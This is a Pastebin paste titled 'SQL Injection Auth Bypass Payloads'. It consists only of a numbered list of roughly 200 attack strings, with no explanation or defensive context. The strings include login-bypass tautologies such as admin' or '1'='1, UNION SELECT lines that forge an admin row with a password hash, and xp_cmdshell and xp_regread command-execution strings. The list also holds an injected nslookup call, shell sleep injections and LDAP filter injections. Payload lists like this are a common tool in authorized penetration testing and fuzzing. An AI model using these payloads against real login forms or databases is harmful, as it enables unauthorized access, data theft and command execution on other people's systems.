Advertisement
fplanzer

SQL Injection Auth Bypass Payloads

Dec 10th, 2019
1,895
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 2.77 KB | None | 0 0
  1. '-'
  2. ' '
  3. '&'
  4. '^'
  5. '*'
  6. ' or ''-'
  7. ' or '' '
  8. ' or ''&'
  9. ' or ''^'
  10. ' or ''*'
  11. "-"
  12. " "
  13. "&"
  14. "^"
  15. "*"
  16. " or ""-"
  17. " or "" "
  18. " or ""&"
  19. " or ""^"
  20. " or ""*"
  21. OR TRUE--
  22. " or true--
  23. ' or true--
  24. ") OR TRUE--
  25. ') or true--
  26. ' OR 'x'='x
  27. ') OR ('x')=('x
  28. ')) OR (('x'))=(('x
  29. " or "x"="x
  30. ") or ("x")=("x
  31. ")) or (("x"))=(("x
  32. or 1=1
  33. or 1=1--
  34. or 1=1#
  35. or 1=1/*
  36. admin' --
  37. admin' #
  38. admin'/*
  39. admin' or '1'='1
  40. admin' or '1'='1'--
  41. admin' or '1'='1'#
  42. admin' or '1'='1'/*
  43. admin'or 1=1 or ''='
  44. admin' or 1=1
  45. admin' or 1=1--
  46. admin' or 1=1#
  47. admin' or 1=1/*
  48. admin') or ('1'='1
  49. admin') or ('1'='1'--
  50. admin') or ('1'='1'#
  51. admin') or ('1'='1'/*
  52. admin') or '1'='1
  53. admin') or '1'='1'--
  54. admin') or '1'='1'#
  55. admin') or '1'='1'/*
  56. 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
  57. admin" --
  58. admin" #
  59. admin"/*
  60. admin" or "1"="1
  61. admin" or "1"="1"--
  62. admin" or "1"="1"#
  63. admin" or "1"="1"/*
  64. admin"or 1=1 or ""="
  65. admin" or 1=1
  66. admin" or 1=1--
  67. admin" or 1=1#
  68. admin" or 1=1/*
  69. admin") or ("1"="1
  70. admin") or ("1"="1"--
  71. admin") or ("1"="1"#
  72. admin") or ("1"="1"/*
  73. admin") or "1"="1
  74. admin") or "1"="1"--
  75. admin") or "1"="1"#
  76. admin") or "1"="1"/*
  77. 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
  78. '
  79. "
  80. #
  81. -
  82. --
  83. '%20--
  84. --';
  85. '%20;
  86. =%20'
  87. =%20;
  88. =%20--
  89. \x23
  90. \x27
  91. \x3D%20\x3B'
  92. \x3D%20\x27
  93. \x27\x4F\x52 SELECT *
  94. \x27\x6F\x72 SELECT *
  95. 'or%20select *
  96. admin'--
  97. <>"'%;)(&+
  98. '%20or%20''='
  99. '%20or%20'x'='x
  100. "%20or%20"x"="x
  101. ')%20or%20('x'='x
  102. 0 or 1=1
  103. ' or 0=0 --
  104. " or 0=0 --
  105. or 0=0 --
  106. ' or 0=0 #
  107. " or 0=0 #
  108. or 0=0 #
  109. ' or 1=1--
  110. " or 1=1--
  111. ' or '1'='1'--
  112. "' or 1 --'"
  113. or 1=1--
  114. or%201=1
  115. or%201=1 --
  116. ' or 1=1 or ''='
  117. " or 1=1 or ""="
  118. ' or a=a--
  119. " or "a"="a
  120. ') or ('a'='a
  121. ") or ("a"="a
  122. hi" or "a"="a
  123. hi" or 1=1 --
  124. hi' or 1=1 --
  125. hi' or 'a'='a
  126. hi') or ('a'='a
  127. hi") or ("a"="a
  128. 'hi' or 'x'='x';
  129. @variable
  130. ,@variable
  131. PRINT
  132. PRINT @@variable
  133. select
  134. insert
  135. as
  136. or
  137. procedure
  138. limit
  139. order by
  140. asc
  141. desc
  142. delete
  143. update
  144. distinct
  145. having
  146. truncate
  147. replace
  148. like
  149. handler
  150. bfilename
  151. ' or username like '%
  152. ' or uname like '%
  153. ' or userid like '%
  154. ' or uid like '%
  155. ' or user like '%
  156. exec xp
  157. exec sp
  158. '; exec master..xp_cmdshell
  159. '; exec xp_regread
  160. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  161. --sp_password
  162. \x27UNION SELECT
  163. ' UNION SELECT
  164. ' UNION ALL SELECT
  165. ' or (EXISTS)
  166. ' (select top 1
  167. '||UTL_HTTP.REQUEST
  168. 1;SELECT%20*
  169. to_timestamp_tz
  170. tz_offset
  171. &lt;&gt;&quot;'%;)(&amp;+
  172. '%20or%201=1
  173. %27%20or%201=1
  174. %20$(sleep%2050)
  175. %20'sleep%2050'
  176. char%4039%41%2b%40SELECT
  177. &apos;%20OR
  178. 'sqlattempt1
  179. (sqlattempt2)
  180. |
  181. %7C
  182. *|
  183. %2A%7C
  184. *(|(mail=*))
  185. %2A%28%7C%28mail%3D%2A%29%29
  186. *(|(objectclass=*))
  187. %2A%28%7C%28objectclass%3D%2A%29%29
  188. (
  189. %28
  190. )
  191. %29
  192. &
  193. %26
  194. !
  195. %21
  196. ' or 1=1 or ''='
  197. ' or ''='
  198. x' or 1=1 or 'x'='y
  199. /
  200. //
  201. //*
  202. */*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement